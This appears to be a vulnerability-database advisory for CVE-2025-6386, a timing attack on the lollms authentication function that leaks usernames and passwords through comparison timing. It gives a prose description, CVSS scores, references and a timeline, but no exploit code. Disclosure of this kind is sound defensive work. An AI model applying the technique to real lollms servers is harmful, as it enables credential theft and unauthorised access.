Timing Attack Vulnerability in parisneo/lollms Authentication Function
CVE-2025-6386

7.5HIGH

Key Information:

Vendor: Parisneo
Status: Parisneo/lollms
Vendor: CVE Published:; 7 July 2025

What is CVE-2025-6386?

The parisneo/lollms repository has a vulnerability in the authenticate_user function found in lollms_authentication.py. This timing attack allows an attacker to uncover valid usernames and incrementally guess passwords by measuring variations in response times. The issue stems from Python's default string equality operator, which processes characters sequentially and reveals discrepancies in timing based on the number of match characters. This vulnerability can be exploited effectively until patched in version 20.1.

Affected Version(s)

parisneo/lollms < 20.1

References

https://huntr.com/bounties/6da05485-d219-4f18-9ffc-991053...

https://github.com/parisneo/lollms/commit/f78437f7b5aa39a...

CVSS V3.0

Score:

7.5

Severity:

HIGH

Confidentiality:

High

Integrity:

None

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Jul 7, 2025
Vulnerability Reserved
Jun 19, 2025

Parisneo

What is CVE-2025-6386?

Affected Version(s)

References

CVSS V3.0

Timeline